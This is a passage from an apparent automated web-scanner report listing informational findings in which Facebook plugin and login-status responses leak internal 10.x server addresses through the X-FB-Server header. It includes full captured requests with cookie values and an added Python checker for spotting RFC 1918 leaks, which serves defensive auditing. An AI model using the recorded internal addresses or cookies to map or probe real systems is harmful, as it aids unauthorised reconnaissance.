parent.postMessage("?=&cb=f1493b4af8&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff390abd57c&relation=parent&transport=postmessage&frame=ff3ee253&result=x
...[SNIP]...

19.47. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=210163452329780&app_id=210163452329780&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31c6162fc%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d015f74c%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20da6dfe8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df58b48b84%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20da6dfe8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ca5b4634%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20da6dfe8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b0222c98%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20da6dfe8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.126.30
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:21 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f2ca5b4634&origin=http\u00253A\u00252F\u00252Fwww.myfitv.com\u00252Ffe3b14c2c&relation=parent&transport=postmessage&frame=f20da6dfe8", "http:\/\/
...[SNIP]...

19.48. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1bf7f9744%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3d7f499b4%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df101212c4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dfbc686034%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df101212c4%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df57b7336c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df101212c4%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df1a31d8abc%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff2426b14e%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df101212c4%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.146.37
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:16 GMT
Content-Length: 267

<script type="text/javascript">
parent.postMessage("?=&cb=f57b7336c&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff2426b14e&relation=parent&transport=postmessage&frame=f101212c4&result=xx
...[SNIP]...

19.49. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.54.142.57

Request

GET /extern/login_status.php?api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df241d003c8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df3a2a431ec%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b5b0ac84%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df128d2c2e%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b5b0ac84%26result%3DxxRESULTTOKENxx&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Dfd50826f8%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b5b0ac84%26result%3DxxRESULTTOKENxx&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df87ba511%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3b5b0ac84%26result%3DxxRESULTTOKENxx&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.142.57
X-Cnection: close
Date: Tue, 06 Sep 2011 12:50:30 GMT
Content-Length: 270

<script type="text/javascript">
parent.postMessage("?=&cb=fd50826f8&origin=http\u00253A\u00252F\u00252Fsports.yahoo.com\u00252Ff390abd57c&relation=parent&transport=postmessage&frame=f3b5b0ac84&result=
...[SNIP]...
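
Every finding in this section is the same pattern: an internal 10.x.x.x address leaking through a response header (X-FB-Server) rather than through the page body. The checker below is an added example, not part of the XSS.Cx/Burp report and not Facebook code. It splits a raw HTTP response into headers and body, extracts dotted-quad candidates and keeps only those that fall inside the three RFC 1918 blocks (10/8, 172.16/12, 192.168/16). It deliberately does not use `ipaddress.is_private`, which also flags loopback, link-local and shared address space and would over-report. The sample response is constructed, modelled on the X-FB-Server responses in this report, with an extra public address, a version string and a five-octet sequence added to show what is ignored.

```python
import ipaddress
import re
from typing import Dict, List, NamedTuple, Tuple

# RFC 1918 blocks only. ipaddress.is_private is broader (127/8, 169.254/16,
# 100.64/10, ...), so the three ranges are spelled out explicitly.
RFC1918_NETWORKS = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
)

# Dotted-quad candidates. The lookarounds reject runs with extra octets
# such as "1.2.3.4.5", which would otherwise yield a bogus partial match.
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


class Disclosure(NamedTuple):
    address: str
    location: str  # "header:<Name>" or "body"


def is_rfc1918(candidate: str) -> bool:
    """True only for syntactically valid IPv4 addresses inside RFC 1918 space."""
    try:
        addr = ipaddress.IPv4Address(candidate)
    except ipaddress.AddressValueError:
        return False  # e.g. a version string like 13.0.782.220
    return any(addr in net for net in RFC1918_NETWORKS)


def split_response(raw: bytes) -> Tuple[Dict[str, str], str]:
    """Split a raw HTTP/1.1 response into a header dict and a body string."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:  # lines[0] is the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers, body.decode("utf-8", errors="replace")


def find_rfc1918_disclosures(raw: bytes) -> List[Disclosure]:
    """Return every RFC 1918 address in the response, tagged with where it sat."""
    headers, body = split_response(raw)
    found: List[Disclosure] = []
    for name, value in headers.items():
        for cand in IPV4_RE.findall(value):
            if is_rfc1918(cand):
                found.append(Disclosure(cand, f"header:{name}"))
    for cand in IPV4_RE.findall(body):
        if is_rfc1918(cand):
            found.append(Disclosure(cand, "body"))
    return found


# Constructed sample response, modelled on the X-FB-Server responses above.
# The body line with 8.8.8.8 / 192.168.1.20 / 1.2.3.4.5 / 13.0.782.220 is
# invented to exercise the public-address, extra-octet and version-string cases.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"X-FB-Server: 10.54.142.57\r\n"
    b"X-Cnection: close\r\n"
    b"Date: Tue, 06 Sep 2011 12:50:30 GMT\r\n"
    b"Content-Length: 270\r\n"
    b"\r\n"
    b'<script type="text/javascript">\n'
    b'parent.postMessage("cb=fd50826f8&relation=parent", "http:\\/\\/sports.yahoo.com");\n'
    b"// build 8.8.8.8 192.168.1.20 1.2.3.4.5 version 13.0.782.220\n"
    b"</script>\n"
)

if __name__ == "__main__":
    for d in find_rfc1918_disclosures(SAMPLE_RESPONSE):
        print(f"{d.address:<16} {d.location}")
```

Run against the constructed sample it reports `10.54.142.57` from `header:X-FB-Server` and `192.168.1.20` from the body, and nothing for 8.8.8.8, the five-octet run or the Chrome-style version string. Feeding it the responses captured by an intercepting proxy gives the same per-finding information the report records here, with the header name attached.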

19.50. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.64.33.58

Request

GET /extern/login_status.php?api_key=117892634961387&app_id=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2aa62330c%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cb8067c%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bd792ca%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df244af3cd8%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e5d649a8%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df19a36be4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.33.58
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:40 GMT
Content-Length: 264

<script type="text/javascript">
parent.postMessage("cb=f244af3cd8&origin=http\u00253A\u00252F\u00252Fservicetips.whitefence.com\u00252Ff22e23ccd4&relation=parent&transport=postmessage&frame=f19a36be4"
...[SNIP]...

19.51. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.54.250.51

Request

GET /extern/login_status.php?api_key=210163452329780&app_id=210163452329780&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca4e4f9c%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff2158a901c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2162a13ac%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff2158a901c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e69481%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df145a1750%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff2158a901c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e69481&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b1d4b078%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff2158a901c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e69481&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e7a08d78%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ff2158a901c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3e69481&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.250.51
X-Cnection: close
Date: Tue, 06 Sep 2011 12:50:37 GMT
Content-Length: 239

<script type="text/javascript">
parent.postMessage("cb=f3b1d4b078&origin=http\u00253A\u00252F\u00252Fwww.myfitv.com\u00252Ff2158a901c&relation=parent&transport=postmessage&frame=f3e69481", "http:\/\/w
...[SNIP]...

19.52. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.64.143.63

Request

GET /plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.143.63
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:43 GMT
Content-Length: 15660

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="qvEJ";</scri
...[SNIP]...

19.53. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.64.35.43

Request

GET /plugins/like.php?api_key=117892634961387&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df350110394%26origin%3Dhttp%253A%252F%252Fservicetips.whitefence.com%252Ff22e23ccd4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fservicetips.whitefence.com%2F&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=110 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.35.43
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:40 GMT
Content-Length: 25783

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.54. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.65.37.36

Request

GET /plugins/like.php?href=facebook.com%2Faptela&layout=button_count&show_faces=false&width=45&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.37.36
X-Cnection: close
Date: Tue, 06 Sep 2011 12:26:30 GMT
Content-Length: 23259

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.55. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.54.134.48

Request

GET /plugins/like.php?action=like&api_key=111580892213144&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2d89b260c%26origin%3Dhttp%253A%252F%252Fsports.yahoo.com%252Ff390abd57c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fsports.yahoo.com%2Fmlb%2Frecap%3Fgid%3D310905122&layout=button_count&locale=en_us&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.48
X-Cnection: close
Date: Tue, 06 Sep 2011 12:50:30 GMT
Content-Length: 26053

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.56. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.64.168.50

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FYahooMovies&layout=standard&show_faces=true&width=250&action=like&font=arial&colorscheme=light&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.168.50
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:01 GMT
Content-Length: 24431

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.57. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.65.40.33

Request

GET /plugins/like.php?href=http://www.facebook.com/xfinity&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.comcast.com/Corporate/Learn/xfinity/wireless-mobile-broadband.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.65.40.33
X-Cnection: close
Date: Tue, 06 Sep 2011 12:24:55 GMT
Content-Length: 23350

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...

19.58. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (seen here in the X-FB-Server header): 10.64.168.48

Request

